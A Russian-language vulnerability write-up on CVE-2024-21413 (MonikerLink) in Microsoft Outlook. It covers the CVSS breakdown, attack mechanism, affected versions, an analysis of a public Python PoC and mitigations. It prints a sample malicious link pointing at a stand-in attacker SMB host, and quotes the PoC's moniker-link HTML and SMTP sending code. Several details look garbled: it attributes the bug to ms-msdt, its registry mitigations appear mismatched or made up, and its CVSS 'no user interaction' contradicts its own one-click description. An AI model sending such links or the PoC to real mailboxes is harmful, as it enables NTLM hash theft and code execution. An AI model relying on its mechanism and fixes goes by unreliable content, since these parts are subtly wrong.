Уязвимость BDU:2024-01322 (CVE-2024-21413) Microsoft Outlook

Уязвимость BDU:2024-01322 (CVE-2024-21413), получившая название #MonikerLink, представляет собой критическую угрозу для Microsoft Outlook. Она позволяет злоумышленникам выполнить удаленный код (RCE) или получить хэши NTLM-паролей через специально сформированные URL. Эксплуатация возможна даже при включенном режиме Protected View, что делает её особенно опасной.

Технический анализ уязвимости

Уровень опасности: 9.8 (Критический)
Вектор атаки: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

1. AV:N (Вектор атаки: Сетевой) – Удалённая эксплуатация через сеть.

2. AC:L (Сложность атаки: Низкая) – Простая реализация без сложных условий.

3. PR:N (Привилегии: Нет) – Доступ к системе не требуется.

4. UI:N (Взаимодействие: Нет) – Участие пользователя не нужно.

5. S:U (Область: Неизменная) – Влияет только на уязвимый компонент.

6. C:H (Конфиденциальность: Высокое) – Полная компрометация данных.

7. I:H (Целостность: Высокое) – Возможность полного изменения данных.

8. A:H (Доступность: Высокое) – Критическое нарушение работы системы.

Интерпретация: Критическая уязвимость (9.8) позволяет удалённо без прав и участия пользователя нарушить конфиденциальность, целостность и доступность системы. Максимальный риск обусловлен сетевым вектором, низкой сложностью эксплуатации и полным контролем над уязвимым компонентом.

Механизм работы

Уязвимость связана с некорректной обработкой Moniker-ссылок – объектов Windows, предназначенных для взаимодействия между приложениями через URI-схемы (например, file://, http://). В Outlook такие ссылки обрабатываются компонентом ms-msdt (Microsoft Support Diagnostics Tool), который не проверяет их содержимое. Это позволяет:

1. Утечку NTLM-хэшей: Автоматический запрос к удаленному SMB-серверу при загрузке изображения (0-click атака).

2. RCE через обход Protected View: Выполнение произвольного кода при открытии вложения или ссылки (1-click атака).

Пример вредоносной ссылки:

<a href="file:///\\attacker.com\share!exploit">Click</a>

Символ ! активирует обработчик Moniker, передавая параметр exploit в ms-msdt.

Условия эксплуатации

1. Целевые версии ПО:

   • Microsoft Office 2016/2019/2021, 365 Apps for Enterprise.

2. Сценарии атаки:

   • Пользователь открывает письмо (для RCE).

   • Автоматическая обработка HTML-контента (для NTLM-утечки).

3. Сетевые требования:

   • Для RCE: Доступ к интернету для загрузки payload.

   • Для NTLM-утечки: Контроль SMB-сервера в локальной сети.

Уязвимое ПО

• Microsoft Office 2016
• Microsoft Office 2019
• Microsoft 365 Apps for Enterprise
• Microsoft Office LTSC 2021

Анализ эксплоита CVE-2024-21413.py

Структура кода

Эксплоит из общего доступа к BDU:2024-01322 использует библиотеку smtplib Python для отправки письма с вредоносной ссылкой. Ключевые элементы:

1. Формирование HTML-тела:

   html = f'''<html><body>
       <img src="{base64_image_string}" alt="Image"><br />
       <h1><a href="file:///{link_url}!poc">CVE-2024-21413 PoC.</a></h1>
   </body></html>'''

   • base64_image_string: Встроенное изображение для обхода блокировки внешних ресурсов.

   • file:///{link_url}!poc: Moniker-ссылка, активирующая уязвимость.

2. SMTP-аутентификация:

   server = smtplib.SMTP(args.server, args.port)
   server.starttls()
   server.login(args.username, args.password)

   Аутентификация на SMTP-сервере позволяет обойти SPF/DKIM/DMARC, повышая доверие к письму.

Защитные меры

1. Патчинг

Установите обновления Microsoft.

2. Блокировка Moniker-схем

В реестре Windows создайте ключ:

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics]
"EnableDiagnostics"=dword:00000000

3. Конфигурация Outlook

• Отключите обработку HTML-писем через групповые политики:

  [HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security]
  "BlockExternalContent"=dword:00000001
  "EnableMonikerLink"=dword:00000000

4. Сетевые ограничения

• Блокируйте исходящие SMB-соединения на межсетевом экране.

• Используйте SMB Signing для предотвращения атак "man-in-the-middle".